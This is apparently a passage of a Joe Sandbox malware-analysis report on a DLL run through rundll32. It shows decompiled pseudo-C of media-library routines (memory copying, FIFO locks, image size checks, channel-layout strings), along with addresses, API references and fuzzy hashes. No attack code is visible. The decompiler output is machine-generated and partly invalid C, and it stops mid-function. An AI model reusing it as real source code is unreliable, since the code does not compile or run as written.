					__esi = __esp[0xb];
					__ecx = __edx + 1;
					if(__ecx >= 8) {
						if((__edi & 0x00000001) != 0) {
							__ecx =  *__esi & 0x000000ff;
							__edi = __edi + 1;
							__esi = __esi + 1;
							 *((char*)(__edi - 1)) = __cl;
							__ecx = __edx;
						}
						if((__edi & 0x00000002) != 0) {
							__edx =  *__esi & 0x0000ffff;
							__edi = __edi + 2;
							__esi = __esi + 2;
							__ecx = __ecx - 2;
							 *((short*)(__edi - 2)) = __dx;
						}
						if((__edi & 0x00000004) != 0) {
							__edx =  *__esi;
							__edi = __edi + 4;
							__esi = __esi + 4;
							__ecx = __ecx - 4;
							 *(__edi - 4) = __edx;
						}
					}
					__esp[7] = __eax;
					__edx =  &(__esp[0xb]);
					__eax = memcpy(__edi, __esi, __ecx);
					__esi + __ecx = __esi + __ecx + __ecx;
					__ecx = 0;
					E100265C0(__edx);
					__eax = __esp[7];
					__esp[0xb] = __esp[7];
					__eax =  *__ebp;
					 *__esp =  *__ebp;
					L100265B0();
					__eax =  *__ebx;
					__ecx = __ebx[1];
					_t8 = __eax - 1; // -1
					__esi = _t8;
					 *__ebx = __esi;
					__eax =  *(__ecx + __esi * 8);
					__edx =  *(__ecx + 4 + __esi * 8);
					 *__ebp =  *(__ecx + __esi * 8);
					__ebp[1] =  *(__ecx + 4 + __esi * 8);
					__eax = __esp[0xb];
					if(__eax == 0) {
						if(__esi == 0) {
							E100265C0(__ebx);
							__eax = __esp[0x14];
							E100265C0(__esp[0x14]);
						}
						__eax =  &(__esp[0xa]);
						__esi = 0;
						E100265C0( &(__esp[0xa]));
						goto L4;
					} else {
						__edx = __ecx + __esi * 8;
						__ecx = __esp[0xa];
						__esi = __esi + 1;
						 *(__edx + 4) = __eax;
						 *__edx = __esp[0xa];
						 *__ebx = __esi;
						__esi = 0;
						L4:
						return 0xfffffff4;
					}
				}
				if( *__ebx == 0) {
					 *_t60 = __ebx + 4;
					E100265C0();
					 *_t60 =  *((intOrPtr*)(_t60 + 0x50));
					E100265C0();
				}
				 *_t60 =  *((intOrPtr*)(_t60 + 0x28));
				L100265B0();
				 *_t60 =  *((intOrPtr*)(_t60 + 0x2c));
				L100265B0();
				goto L4;
			}

0x10011488
0x1001148b
0x1001148d
0x10011491
0x10011496
0x1001149a
0x1001149d
0x1001149f
0x100114a4
0x100114a7
0x100114a9
0x100114ad
0x100114ad
0x100114b1
0x100114b5
0x100114bc
0x100114c2
0x100114c6
0x100114c9
0x100114cd
0x100114d3
0x1001151e
0x10011540
0x10011543
0x10011544
0x10011545
0x10011548
0x10011548
0x10011526
0x1001154c
0x1001154f
0x10011552
0x10011555
0x10011558
0x10011558
0x1001152e
0x10011530
0x10011532
0x10011535
0x10011538
0x1001153b
0x1001153b
0x1001152e
0x100114d5
0x100114d9
0x100114dd
0x100114dd
0x100114dd
0x100114e2
0x100114e7
0x100114eb
0x100112fc
0x100112ff
0x10011302
0x10011307
0x10011309
0x1001130c
0x1001130c
0x1001130f
0x10011311
0x10011314
0x10011318
0x1001131b
0x1001131e
0x10011324
0x1001146a
0x100114fe
0x10011503
0x1001150a
0x1001150a
0x10011470
0x10011474
0x10011479
0x00000000
0x1001132a
0x1001132a
0x1001132d
0x10011331
0x10011332
0x10011335
0x10011337
0x10011339
0x100112b6
0x100112cb
0x100112cb
0x10011324
0x10011298
0x10011413
0x10011416
0x1001141f
0x10011422
0x10011422
0x100112a2
0x100112a5
0x100112ae
0x100112b1
0x00000000

APIs

strlen.MSVCRT ref: 10011491
strlen.MSVCRT ref: 1001149F
mv_realloc.MAIN ref: 100114B5

Part of subcall function 10026280: _aligned_realloc.MSVCRT ref: 100262AB

mv_freep.MAIN ref: 100114E2

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$_aligned_reallocmv_freepmv_realloc
String ID:
API String ID: 895301365-0
Opcode ID: 04da3bf766d47488039e948dce66939b5b65f249d2add762eec63dcc3e51c44d
Instruction ID: 51621a72b6bbd22e45abe63bff26c18dabce81ca6188ceac0dc85253792fa2d5
Opcode Fuzzy Hash: 04da3bf766d47488039e948dce66939b5b65f249d2add762eec63dcc3e51c44d
Instruction Fuzzy Hash: F121B3B8908712CFCB14DF24C48055AB7E5FF89344F458A5EE9999B305E731EA46CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1009D6A0 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 1009D6B9
_unlock.MSVCRT ref: 1009D6E1
calloc.MSVCRT ref: 1009D72F

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 357fb2442f9bcdd85ef6b46d033be08ae312da071a22b7525909557a6230c189
Instruction ID: 6cddb97a3fd8d0d05461b53b71359434b8c1691dc6b4f2f6cc4d1d10a1eaf7a4
Opcode Fuzzy Hash: 357fb2442f9bcdd85ef6b46d033be08ae312da071a22b7525909557a6230c189
Instruction Fuzzy Hash: BF115E75544201CFDB40EF78C59071ABBE4FF84250F16896AD98CCF249EB74D840EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1001232B Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

mv_bprint_escape.MAIN ref: 100122B3

Part of subcall function 10009730: mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB

mv_bprint_append_data.MAIN ref: 100122CC
mv_bprint_escape.MAIN ref: 100122EE
mv_bprint_finalize.MAIN ref: 1001231B
mv_bprint_append_data.MAIN ref: 1001234B

Part of subcall function 10008F30: mv_realloc.MAIN ref: 10008F73

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprintfmv_realloc
String ID:
API String ID: 1942445456-0
Opcode ID: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
Instruction ID: 403ebcfaa7f6bf6d2df9c5cc3f9910434a712b72dc8362acc2447b37bc06364c
Opcode Fuzzy Hash: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
Instruction Fuzzy Hash: 752199B59183019FD360DF29C08069AFBE1FB89348F50892EE58CC7301E736E981CB46

Uniqueness

Uniqueness Score: -1.00%

Function 1000C7D9 Relevance: 7.5, APIs: 5, Instructions: 36stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 1000C7E0
strtol.MSVCRT ref: 1000C804
_errno.MSVCRT ref: 1000C80B
_errno.MSVCRT ref: 1000C822
_errno.MSVCRT ref: 1000C848

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _errno$strtol
String ID:
API String ID: 3596500743-0
Opcode ID: 94420cbffd51064d18b4594c717699c8f84a31741584a0f27c6857c5b8a8326f
Instruction ID: e5a68f2e7340340f2a0c1abd8e62d28df7ecd48bc61271be75172e8c5bb86d30
Opcode Fuzzy Hash: 94420cbffd51064d18b4594c717699c8f84a31741584a0f27c6857c5b8a8326f
Instruction Fuzzy Hash: CD01E474A0931A9FD744EF65C88871ABBE2FF85740F55C86DE88987724EB74E8408B42

Uniqueness

Uniqueness Score: -1.00%

Function 1004B020 Relevance: 7.5, APIs: 5, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E1004B020(void* __edi, void* __ebp, void* __eflags, intOrPtr* _a4) {
				char _v20;
				char* _v36;
				intOrPtr* _v40;
				char _v44;
				void* __ebx;
				void* __esi;
				char _t10;
				intOrPtr* _t14;
				char _t18;
				intOrPtr* _t21;

				_t14 = _a4;
				_t18 = _t14 + 4;
				_v44 = _t18;
				L1009DE58();
				_t21 =  &_v36 - 4;
				 *_t21 =  *_t14;
				_t10 = L10017F10();
				_v20 = _t10;
				if( *((intOrPtr*)(_t14 + 0x1c)) != 0) {
					_v40 = _t14;
					_v36 =  &_v20;
					_v44 = 0x1004aba0;
					 *_t21 =  *_t14;
					_t10 = E100186C0(_t14, __edi, _t18);
				}
				 *_t21 = _t14 + 0xc;
				__imp__WakeAllConditionVariable();
				 *((intOrPtr*)(_t21 - 4)) = _t18;
				L1009DE50();
				return _t10;
			}

0x1004b025
0x1004b029
0x1004b02c
0x1004b02f
0x1004b036
0x1004b039
0x1004b03c
0x1004b046
0x1004b04a
0x1004b04c
0x1004b054
0x1004b05d
0x1004b063
0x1004b066
0x1004b066
0x1004b06e
0x1004b071
0x1004b07a
0x1004b07d
0x1004b08a

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 1004B02F
mv_fifo_can_read.MAIN ref: 1004B03C
mv_fifo_read_to_cb.MAIN ref: 1004B066
WakeAllConditionVariable.KERNEL32 ref: 1004B071
ReleaseSRWLockExclusive.KERNEL32 ref: 1004B07D

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionReleaseVariableWakemv_fifo_can_readmv_fifo_read_to_cb
String ID:
API String ID: 93134951-0
Opcode ID: b04aa90755bf11445e363e889d079bebaf352ae153b96380cc2547109b9fea1a
Instruction ID: f622ea8ca44b4a077811579624edcdfc0bd4128ea1142ae48ea321c74ce907da
Opcode Fuzzy Hash: b04aa90755bf11445e363e889d079bebaf352ae153b96380cc2547109b9fea1a
Instruction Fuzzy Hash: D5F0B6F5908A109FCB40FF39E5C550ABBE0EF45644F41892DF8898B209E634E595CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1002A192 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 10028D90: strcmp.MSVCRT ref: 10028DC8
Part of subcall function 10028D90: strcmp.MSVCRT ref: 10028DE8

mv_log.MAIN ref: 1002A471

Strings

Value %f for parameter '%s' out of range [%g - %g], xrefs: 1002A44E
Value %f for parameter '%s' is not a valid set of 32bit integer flags, xrefs: 1002A41D

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp$mv_log
String ID: Value %f for parameter '%s' is not a valid set of 32bit integer flags$Value %f for parameter '%s' out of range [%g - %g]
API String ID: 2835281190-116802341
Opcode ID: 307d38743698b291979d8cba9ea0ea86772061f596d5267834f9e20a1e2d30a9
Instruction ID: 36e62bc8f0de24f566176e25824a2ed98854e2226bbbd516fe818f77359d1b1a
Opcode Fuzzy Hash: 307d38743698b291979d8cba9ea0ea86772061f596d5267834f9e20a1e2d30a9
Instruction Fuzzy Hash: 5D71AC35918F45CBC382DF38E48111AFBA5FFDB2E0F91971AF8966A250DB3084C19742

Uniqueness

Uniqueness Score: -1.00%

Function 100204C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E100204C0(signed int __edx, void* __eflags, char _a4, signed int* _a8, signed int _a12, char _a16, char* _a20, char _a24, signed int _a28) {
				signed int _v4;
				intOrPtr _v8;
				char* _v12;
				signed int* _v16;
				intOrPtr _v32;
				char* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char* _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int* _v72;
				char _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				void* __ebx;
				void* __edi;
				signed int __esi;
				void* __ebp;
				void* _t107;
				signed int _t108;
				signed int _t115;
				char* _t138;
				signed int _t143;
				intOrPtr _t148;
				void* _t149;
				signed int* _t150;
				char _t152;
				intOrPtr _t161;
				intOrPtr _t162;
				signed int _t163;
				signed int _t171;
				char _t176;
				intOrPtr _t177;
				intOrPtr _t178;
				void* _t180;
				intOrPtr _t186;
				void* _t187;
				char* _t188;
				char* _t190;
				void* _t192;
				void* _t193;
				signed int _t195;
				intOrPtr _t198;
				void* _t199;
				signed int** _t200;

				_t163 = __edx;
				_t200 = _t199 - 0x5c;
				 *_t200 = 0xffffffff;
				_t188 = _a20;
				_t150 = _a8;
				_t195 = _a28;
				_v52 = _a4;
				_v104 = _t188;
				_v48 = _a12;
				_v56 = _a16;
				_v60 = _a24;
				_v40 = 0x100b3560;
				_v36 = 0;
				_v32 = 0;
				_v100 = 0;
				_t107 = L1001E960(__eflags, _t149, _t187, _t180);
				asm("cdq");
				_t205 = 0 - _t107;
				asm("sbb edi, edx");
				if(0 >= _t107) {
					0 = (0 << 0x00000020 | __esi) << 3;
					__eflags = __esi << 3;
				}
				_t108 = _t107 + 0x400;
				_v68 = _t108;
				asm("adc edx, 0x0");
				__eflags = _t188;
				_v64 = _t163;
				_v60 = _t108 & 0xffffff00 | _v60 <= 0x00000000 | _t163 & 0xffffff00 | _t188 <= 0x00000000;
				if((_t108 & 0xffffff00 | _v60 <= 0x00000000 | _t163 & 0xffffff00 | _t188 <= 0x00000000) != 0) {
					L20:
					_v96 = _t188;
					_v104 = 0x10;
					_v92 = _v60;
					_v100 = "Picture size %ux%u is invalid\n";
					 *_t200 =  &_v40;
					L10023A40();
					_t115 = 0xffffffea;
					goto L21;
				} else {
					__eflags = 0x7ffffffe - _v68;
					asm("sbb ecx, edx");
					if(0x7ffffffe < _v68) {
						goto L20;
					} else {
						__eflags = 0x7ffffffe - (_v60 + 0x80) * _v68;
						asm("sbb edi, edx");
						if(__eflags < 0) {
							goto L20;
						} else {
							_v100 = _t188;
							_t190 = _v56;
							 *_t200 = _t150;
							_v104 = _t190;
							_t115 = L1001EAB0(__eflags);
							__eflags = _t115;
							if(__eflags < 0) {
								L21:
								return _t115;
							} else {
								_t171 =  ~_t195;
								 *_t150 =  *_t150 + _t195 - 0x00000001 & _t171;
								_t150[1] = _t150[1] + _t195 - 0x00000001 & _t171;
								_t150[2] = _t150[2] + _t195 - 0x00000001 & _t171;
								_t150[3] = _t150[3] + _t195 - 0x00000001 & _t171;
								_a20 = _t150;
								_a8 = _t190;
								_a16 = _v48;
								_a12 = _v60;
								_a4 = _v52;
								_t200 =  &(_t200[0x17]);
								_pop(_t150);
								_pop(_t188);
								_pop(0);
								_pop(_t195);
								_v16 = _t150;
								_t152 = _a4;
								_v12 = _t188;
								_t138 = _a20;
								_v8 = 0;
								_v4 = _t195;
								 *_t152 = 0;
								 *((intOrPtr*)(_t152 + 4)) = 0;
								 *((intOrPtr*)(_t152 + 8)) = 0;
								 *((intOrPtr*)(_t152 + 0xc)) = 0;
								_v60 =  *_t138;
								_v56 = _t138[4];
								_v64 =  &_v60;
								_v52 = _t138[8];
								_v48 = _t138[0xc];
								_v68 = _a12;
								_v72 = _a8;
								 *((intOrPtr*)(_t200 - 0x4c)) =  &_v44;
								_t143 = L1001EE90(_t152, 0, _t188, _t195, _t205);
								if(_t143 >= 0) {
									_t161 = _v44;
									if(_t161 < 0) {
										L13:
										_t143 = 0xffffffea;
									} else {
										_t186 = _v40;
										if(0x7fffffff - _t161 < _t186) {
											goto L13;
										} else {
											_t198 = _v36;
											_t192 = _t161 + _t186;
											if(0x7fffffff - _t192 < _t198) {
												goto L13;
											} else {
												_t148 = _v32;
												_t193 = _t192 + _t198;
												if(0x7fffffff - _t193 < _t148) {
													goto L13;
												} else {
													if(_a16 != 0) {
														_t176 = _a16;
														 *_t152 = _t176;
														if(_t186 != 0) {
															_t162 = _t161 + _t176;
															 *((intOrPtr*)(_t152 + 4)) = _t162;
															_t177 = _t162;
															if(_t198 != 0) {
																_t178 = _t177 + _t186;
																 *((intOrPtr*)(_t152 + 8)) = _t178;
																if(_t148 != 0) {
																	 *((intOrPtr*)(_t152 + 0xc)) = _t178 + _t198;
																}
															}
														}
													}
													_t143 = _t148 + _t193;
												}
											}
										}
									}
								}
								return _t143;
							}
						}
					}
				}
			}

0x100204c0
0x100204c6
0x100204c9
0x100204d4
0x100204db
0x100204df
0x100204e6
0x100204ee
0x100204f2
0x100204fa
0x10020505
0x1002050e
0x10020514
0x1002051a
0x10020520
0x10020524
0x10020529
0x1002052a
0x1002052c
0x1002052e
0x10020534
0x10020538
0x10020538
0x1002053f
0x10020544
0x10020548
0x1002054b
0x1002054d
0x10020559
0x1002055b
0x10020620
0x10020620
0x1002062d
0x10020631
0x1002063a
0x10020642
0x10020645
0x1002064a
0x00000000
0x10020561
0x10020573
0x10020575
0x10020577
0x00000000
0x1002057d
0x10020594
0x1002059b
0x1002059d
0x00000000
0x100205a3
0x100205a3
0x100205a7
0x100205ab
0x100205ae
0x100205b2
0x100205b7
0x100205b9
0x1002064f
0x10020656
0x100205bf
0x100205c3
0x100205ca
0x100205d4
0x100205df
0x100205ea
0x100205f1
0x100205f8
0x100205fc
0x10020604
0x1002060c
0x10020610
0x10020613
0x10020614
0x10020615
0x10020616
0x1001efd3
0x1001efd7
0x1001efdf
0x1001efe3
0x1001efe7
0x1001efeb
0x1001efef
0x1001eff5
0x1001effc
0x1001f003
0x1001f00c
0x1001f013
0x1001f01d
0x1001f021
0x1001f025
0x1001f02d
0x1001f035
0x1001f03d
0x1001f040
0x1001f047
0x1001f049
0x1001f04f
0x1001f0c0
0x1001f0c0
0x1001f051
0x1001f051
0x1001f060
0x00000000
0x1001f062
0x1001f062
0x1001f066
0x1001f06f
0x00000000
0x1001f071
0x1001f071
0x1001f075
0x1001f07b
0x00000000
0x1001f07d
0x1001f083
0x1001f085
0x1001f08b
0x1001f08d
0x1001f08f
0x1001f093
0x1001f096
0x1001f098
0x1001f09a
0x1001f09e
0x1001f0a1
0x1001f0a5
0x1001f0a5
0x1001f0a1
0x1001f098
0x1001f08d
0x1001f0a8
0x1001f0a8
0x1001f07b
0x1001f06f
0x1001f060
0x1001f04f
0x1001f0bd
0x1001f0bd
0x100205b9
0x1002059d
0x10020577

APIs

mv_image_get_linesize.MAIN ref: 10020524

Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976

mv_image_fill_linesizes.MAIN(?), ref: 100205B2

Strings

Picture size %ux%u is invalid, xrefs: 10020635

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_image_fill_linesizesmv_image_get_linesizemv_pix_fmt_desc_get
String ID: Picture size %ux%u is invalid
API String ID: 547003755-1963597007
Opcode ID: 55cc673a7fd8fa65950412ae644b1255500889416eca15a6256c6aad94377d03
Instruction ID: 76d0c1c0ea3a07b63bf36c4eb498433e90d4a1915968e7ac4ed20e6f6339bb64
Opcode Fuzzy Hash: 55cc673a7fd8fa65950412ae644b1255500889416eca15a6256c6aad94377d03
Instruction Fuzzy Hash: 73412576A097508FC350CF29D88074ABBE2FFC8610F558A2EF9A8CB351E634D8418F42

Uniqueness

Uniqueness Score: -1.00%

Function 100281D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

mv_log.MAIN ref: 100284FD

Strings

Value %f for parameter '%s' out of range [%g - %g], xrefs: 100284E1
Value %f for parameter '%s' is not a valid set of 32bit integer flags, xrefs: 10028528

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log
String ID: Value %f for parameter '%s' is not a valid set of 32bit integer flags$Value %f for parameter '%s' out of range [%g - %g]
API String ID: 2418673259-116802341
Opcode ID: 0e86dea9d7dbfb0fa736b3973e9ea318f8df20d9c4df400857962a6312e3acc6
Instruction ID: 4b2a81cc611bfd366bf19134ab3879e08e1fa9318fff0f4b80787780fc68846e
Opcode Fuzzy Hash: 0e86dea9d7dbfb0fa736b3973e9ea318f8df20d9c4df400857962a6312e3acc6
Instruction Fuzzy Hash: A0414A3581AF958BC382DF38909111BF7E4FFDA380F819B5EF88676652C73095428742

Uniqueness

Uniqueness Score: -1.00%

Function 1000D684 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D684(void* __edi) {
				void* _t75;

				while(1) {
					L16:
					__eax =  *(__edi + 8);
					__ebx = __ebp;
					__edx =  *(__edi + 0xc);
					__esp[4] =  *(__edi + 8);
					__esp[5] =  *(__edi + 0xc);
					while(1) {
						__esp[7] = __ebp;
						__eax = __esp[4];
						__ecx = 0;
						__edx = __esp[5];
						__ebp = __edi;
						do {
							L20:
							__edi = __edx;
							__esi = __eax;
							__esi = (__edi << 0x00000020 | __eax) >> __cl;
							__edi = __edi >> __cl;
							if((__cl & 0x00000020) != 0) {
								__esi = __edi;
							}
							__esi = __esi & 0x00000001;
							if(__esi == 0) {
								goto L19;
							}
							_t31 = __ebx - 1; // 0x0
							__esi = _t31;
							if(__ebx != 0) {
								__ebx = __esi;
								goto L19;
							}
							__edi = __ebp;
							__ebp = __esp[7];
							if(__ebp != 0) {
								__esp[4] = __ecx;
								__eax = 0x100aeacf;
								__esp[1] = 0x100aeacf;
								__eax = __esp[6];
								 *__esp = __esp[6];
								__eax = L100089C0();
								__ecx = __esp[4];
								L38:
								if(__ecx <= 0x28) {
									L26:
									__eax =  *(0x100af280 + __ecx * 8);
									if(__eax == 0) {
										L32:
										__esp[2] = __ecx;
										__eax = __esp[6];
										__ebx = "USR%d";
										__esp[1] = "USR%d";
										 *__esp = __esp[6];
										__eax = L100089C0();
										L10:
										while(1) {
											L10:
											if( *__edi != 2) {
												L3:
												__esi =  *(__edi + 4);
												__ebp = __ebp + 1;
												if(__esi <= __ebp) {
													L14:
													if(__esi == 0) {
														__eax = 0;
														__esp[2] = 0;
														__eax = "%d channels";
														__esp[1] = "%d channels";
														__eax = __esp[6];
														 *__esp = __esp[6];
														L100089C0() = 0;
													} else {
														__eax = __esp[6];
														__edx = 0x100aead1;
														__esp[1] = 0x100aead1;
														 *__esp = __esp[6];
														L100089C0() = 0;
													}
													return _t75;
												}
												L4:
												if(__ebp >= __esi) {
													L42:
													__eax = 0x100aeacf;
													__esp[1] = 0x100aeacf;
													__eax = __esp[6];
													 *__esp = __esp[6];
													__eax = L100089C0();
													L9:
													__eax = __esp[6];
													__esi = "NONE";
													__esp[1] = "NONE";
													 *__esp = __esp[6];
													__eax = L100089C0();
													continue;
												}
												__eax =  *__edi;
